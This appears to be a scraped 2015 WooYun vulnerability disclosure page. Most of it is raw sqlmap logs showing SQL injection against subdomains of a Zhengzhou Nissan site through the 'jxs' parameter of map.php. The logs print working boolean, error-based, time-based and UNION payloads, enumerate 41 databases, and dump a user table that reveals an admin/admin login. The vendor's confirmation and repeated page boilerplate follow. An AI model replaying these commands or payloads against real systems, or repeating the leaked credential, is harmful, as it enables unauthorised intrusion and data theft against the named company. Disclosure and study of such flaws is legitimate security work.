[22:43:30] [INFO] retrieved: "realname","varchar(255)"
[22:43:35] [INFO] retrieved: "keyno","varchar(25)"
[22:43:36] [INFO] retrieved: "keypin","varchar(255)"
[22:43:36] [INFO] retrieved: "usekey","tinyint(1)"
[22:43:36] [INFO] retrieved: "jxs_uid","int(11)"
[22:43:37] [INFO] retrieved: "area_id","int(11)"
Database: zznissan                                                             
Table: car_user
[19 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| addCount       | int(10) unsigned |
| addtime        | datetime         |
| area_id        | int(11)          |
| depid          | tinyint(2)       |
| groupid        | tinyint(2)       |
| id             | tinyint(5)       |
| ip             | varchar(255)     |
| jxs_uid        | int(11)          |
| keyno          | varchar(25)      |
| keypin         | varchar(255)     |
| operator_id    | int(11)          |
| password       | varchar(32)      |
| realname       | varchar(255)     |
| usekey         | tinyint(1)       |
| user_dep_id    | int(11)          |
| user_dep_name  | varchar(255)     |
| user_deprights | text             |
| userEmail      | varchar(50)      |
| username       | varchar(20)      |
+----------------+------------------+
[22:43:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:43:37
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --dump -T car_user -C "username,password" -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:44:48
[22:44:48] [INFO] resuming back-end DBMS 'mysql' 
[22:44:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:44:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:44:49] [INFO] fetching columns 'password, username' for table 'car_user' in database 'zznissan'
[22:44:50] [INFO] the SQL query used returns 2 entries
[22:44:50] [INFO] retrieved: "username","varchar(20)"
[22:44:51] [INFO] retrieved: "password","varchar(32)"
[22:44:51] [INFO] fetching entries of column(s) 'password, username' for table 'car_user' in database 'zznissan'
[22:44:51] [INFO] the SQL query used returns 1 entries
[22:44:51] [INFO] retrieved: "admin","admin"
[22:44:51] [INFO] analyzing table dump for possible password hashes            
Database: zznissan
Table: car_user
[1 entry]
+----------+----------+
| username | password |
+----------+----------+
| admin    | admin    |
+----------+----------+
[22:44:51] [INFO] table 'zznissan.car_user' dumped to CSV file '/root/.sqlmap/output/hbjzmh.zznissan.com.cn/dump/zznissan/car_user.csv'
[22:44:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:44:51
root@kailroot:~#sqlmap -u http://dongguanhuizhan.zznissan.com.cn/map.php?jxs=181 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:46:19
[22:46:20] [INFO] testing connection to the target URL
[22:46:21] [INFO] testing if the target URL is stable
[22:46:21] [INFO] target URL is stable
[22:46:21] [INFO] testing if GET parameter 'jxs' is dynamic
[22:46:21] [INFO] confirming that GET parameter 'jxs' is dynamic
[22:46:22] [INFO] GET parameter 'jxs' is dynamic
[22:46:22] [INFO] heuristic (basic) test shows that GET parameter 'jxs' might be injectable (possible DBMS: 'MySQL')
[22:46:22] [INFO] heuristic (XSS) test shows that GET parameter 'jxs' might be vulnerable to XSS attacks
[22:46:22] [INFO] testing for SQL injection on GET parameter 'jxs'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[22:46:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:46:38] [WARNING] reflective value(s) found and filtering out
[22:46:44] [INFO] GET parameter 'jxs' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:46:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:46:45] [INFO] GET parameter 'jxs' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[22:46:45] [INFO] testing 'MySQL inline queries'
[22:46:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:46:46] [WARNING] time-based comparison requires larger statistical model, please wait............
[22:46:56] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:46:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:46:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:46:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:46:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:46:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:46:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:47:04] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:47:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:47:14] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[22:47:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:47:25] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[22:47:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:47:39] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[22:47:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:01] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:12] [CRITICAL] unable to connect to the target URL or proxy
[22:48:42] [INFO] GET parameter 'jxs' seems to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[22:48:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:48:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:48:43] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:48:45] [INFO] target URL appears to have 17 columns in query
[22:48:51] [INFO] GET parameter 'jxs' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'jxs' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=181' AND 3162=3162 AND 'juNh'='juNh
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=181' AND (SELECT 8652 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(8652=8652,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kBIc'='kBIc
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=181' OR SLEEP(5) AND 'bZVJ'='bZVJ
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=181' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x6f4f635651624a744778,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:48:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:48:52] [INFO] fetching database names
[22:48:52] [INFO] the SQL query used returns 41 entries
[22:48:53] [INFO] retrieved: information_schema
[22:48:53] [INFO] retrieved: club_15
[22:48:54] [INFO] retrieved: ebuy
[22:48:54] [INFO] retrieved: ebuy1217
[22:48:55] [INFO] retrieved: events
[22:48:55] [INFO] retrieved: events_2014cgr
[22:48:56] [INFO] retrieved: events_2014five
[22:48:56] [INFO] retrieved: events_pickupStory
[22:48:56] [INFO] retrieved: ezznissan
[22:48:56] [INFO] retrieved: innodb
[22:48:57] [INFO] retrieved: jinzhiwen
[22:48:57] [INFO] retrieved: maintain
[22:49:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:49:08] [INFO] retrieved: mysql
[22:49:08] [INFO] retrieved: nissan
[22:49:09] [INFO] retrieved: nissan_2015cgr
[22:49:10] [INFO] retrieved: nissan_jxs
[22:49:10] [INFO] retrieved: nissan_patrol
[22:49:10] [INFO] retrieved: nissanmedia
[22:49:11] [INFO] retrieved: nissantest
[22:49:11] [INFO] retrieved: paladin
[22:49:11] [INFO] retrieved: paladinclub
[22:49:12] [INFO] retrieved: paladinclubtemp
[22:49:12] [INFO] retrieved: palaqi
[22:49:13] [INFO] retrieved: performance_schema
[22:49:13] [INFO] retrieved: specialcar
[22:49:13] [INFO] retrieved: test
[22:49:14] [INFO] retrieved: topic
[22:49:14] [INFO] retrieved: tower_15
[22:49:15] [INFO] retrieved: wqw_five
[22:49:15] [INFO] retrieved: wqw_mx6gc
[22:49:15] [INFO] retrieved: wqw_succk
[22:49:16] [INFO] retrieved: xuhui
[22:49:16] [INFO] retrieved: yaguan
[22:49:16] [INFO] retrieved: zznissan
[22:49:17] [INFO] retrieved: zznissan_eng
[22:49:17] [INFO] retrieved: zznissan_jnds
[22:49:18] [INFO] retrieved: zznissan_lms2015
[22:49:18] [INFO] retrieved: zznissan_mx6sj2015
[22:49:18] [INFO] retrieved: zznissan_mx6tg2015
[22:49:18] [INFO] retrieved: zznissan_pro
[22:49:19] [INFO] retrieved: zznissanbak
available databases [41]:                                                      
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak
[22:49:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dongguanhuizhan.zznissan.com.cn'
[*] shutting down at 22:49:19
root@kailroot:~# sqlmap -u http://esxcc.zznissan.com.cn/map.php?jxs=149 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:51:25
[22:51:26] [INFO] testing connection to the target URL
[22:51:27] [INFO] testing if the target URL is stable
[22:51:27] [INFO] target URL is stable
[22:51:27] [INFO] testing if GET parameter 'jxs' is dynamic
[22:51:27] [INFO] confirming that GET parameter 'jxs' is dynamic
[22:51:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:51:38] [INFO] GET parameter 'jxs' is dynamic
[22:51:39] [INFO] heuristic (basic) test shows that GET parameter 'jxs' might be injectable (possible DBMS: 'MySQL')
[22:51:39] [INFO] heuristic (XSS) test shows that GET parameter 'jxs' might be vulnerable to XSS attacks
[22:51:39] [INFO] testing for SQL injection on GET parameter 'jxs'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[22:51:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:52:09] [WARNING] reflective value(s) found and filtering out
[22:52:10] [INFO] GET parameter 'jxs' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:52:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:52:16] [INFO] GET parameter 'jxs' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[22:52:16] [INFO] testing 'MySQL inline queries'
[22:52:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:52:16] [WARNING] time-based comparison requires larger statistical model, please wait............
[22:52:25] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:52:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:52:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:52:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:52:37] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:52:37] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:52:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:52:43] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:52:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:52:53] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[22:52:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:53:04] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[22:53:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:14] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[22:53:25] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:36] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:47] [CRITICAL] unable to connect to the target URL or proxy
[22:53:57] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:54:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:54:30] [CRITICAL] unable to connect to the target URL or proxy
[22:54:30] [INFO] GET parameter 'jxs' seems to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[22:54:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:54:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:54:30] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:54:33] [INFO] target URL appears to have 17 columns in query
[22:54:33] [INFO] GET parameter 'jxs' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'jxs' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=149' AND 6651=6651 AND 'xxwO'='xxwO
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=149' AND (SELECT 4415 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(4415=4415,1))),0x716b6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vCSk'='vCSk
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=149' OR SLEEP(5) AND 'vSJt'='vSJt
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=149' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162786a71,0x7154484a566576724b62,0x716b6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:57:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:57:52] [INFO] fetching database names
[22:57:53] [INFO] the SQL query used returns 41 entries
[22:57:58] [INFO] retrieved: information_schema
[22:57:59] [INFO] retrieved: club_15
[22:57:59] [INFO] retrieved: ebuy
[22:57:59] [INFO] retrieved: ebuy1217
[22:58:00] [INFO] retrieved: events
[22:58:00] [INFO] retrieved: events_2014cgr
[22:58:05] [INFO] retrieved: events_2014five
[22:58:05] [INFO] retrieved: events_pickupStory
[22:58:06] [INFO] retrieved: ezznissan
[22:58:06] [INFO] retrieved: innodb
[22:58:06] [INFO] retrieved: jinzhiwen
[22:58:06] [INFO] retrieved: maintain
[22:58:07] [INFO] retrieved: mysql
[22:58:07] [INFO] retrieved: nissan
[22:58:07] [INFO] retrieved: nissan_2015cgr
[22:58:08] [INFO] retrieved: nissan_jxs
[22:58:08] [INFO] retrieved: nissan_patrol
[22:58:09] [INFO] retrieved: nissanmedia
[22:58:09] [INFO] retrieved: nissantest
[22:58:09] [INFO] retrieved: paladin
[22:58:09] [INFO] retrieved: paladinclub
[22:58:09] [INFO] retrieved: paladinclubtemp
[22:58:15] [INFO] retrieved: palaqi
[22:58:15] [INFO] retrieved: performance_schema
[22:58:16] [INFO] retrieved: specialcar
[22:58:16] [INFO] retrieved: test
[22:58:16] [INFO] retrieved: topic
[22:58:17] [INFO] retrieved: tower_15
[22:58:17] [INFO] retrieved: wqw_five
[22:58:22] [INFO] retrieved: wqw_mx6gc
[22:58:23] [INFO] retrieved: wqw_succk
[22:58:23] [INFO] retrieved: xuhui
[22:58:24] [INFO] retrieved: yaguan
[22:58:24] [INFO] retrieved: zznissan
[22:58:24] [INFO] retrieved: zznissan_eng
[22:58:24] [INFO] retrieved: zznissan_jnds
[22:58:24] [INFO] retrieved: zznissan_lms2015
[22:58:25] [INFO] retrieved: zznissan_mx6sj2015
[22:58:25] [INFO] retrieved: zznissan_mx6tg2015
[22:58:25] [INFO] retrieved: zznissan_pro
[22:58:26] [INFO] retrieved: zznissanbak
available databases [41]:                                                      
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak
[22:58:26] [INFO] fetched data logged to text files under '/root/.sqlmap/output/esxcc.zznissan.com.cn'
[*] shutting down at 22:58:26
root@kailroot:~# sqlmap -u http://dongguanhuizhan.zznissan.com.cn/map.php?jxs=181 --is-dba
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:59:09
[22:59:09] [INFO] resuming back-end DBMS 'mysql' 
[22:59:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=181' AND 3162=3162 AND 'juNh'='juNh
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=181' AND (SELECT 8652 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(8652=8652,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kBIc'='kBIc
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=181' OR SLEEP(5) AND 'bZVJ'='bZVJ
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=181' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x6f4f635651624a744778,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:59:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:59:10] [INFO] testing if current user is DBA
[22:59:10] [INFO] fetching current user
current user is DBA:    False
[22:59:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dongguanhuizhan.zznissan.com.cn'
[*] shutting down at 22:59:10
root@kailroot:~#

$%J_0O9{L5CW6~0Q2N%)PRVL.png$

修复方案：

版权声明：转载请注明来源 SunnyDoll@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：2

确认时间：2015-11-25 11:29

厂商回复：

已确认

漏洞评价：

评价

2015-11-25 12:14 | SunnyDoll ( 实习白帽子 | Rank:63 漏洞数:20 | 职业搬砖工)

@郑州日产汽车有限公司哎呀我去什么叫低. 看来还得一个一个的发
2015-11-30 16:00 | 郑州日产汽车有限公司(乌云厂商)

@SunnyDoll 这个注入点此前已经通过其他渠道知悉了，正在修复中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155681

漏洞标题：郑州日产汽车有限公司存在大量的sql注入

相关厂商：郑州日产汽车有限公司

漏洞作者： SunnyDoll

提交时间：2015-11-25 09:58

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 SunnyDoll@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155681

漏洞标题：郑州日产汽车有限公司存在大量的sql注入

相关厂商：郑州日产汽车有限公司

漏洞作者： SunnyDoll

提交时间：2015-11-25 09:58

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0155681"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 SunnyDoll@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：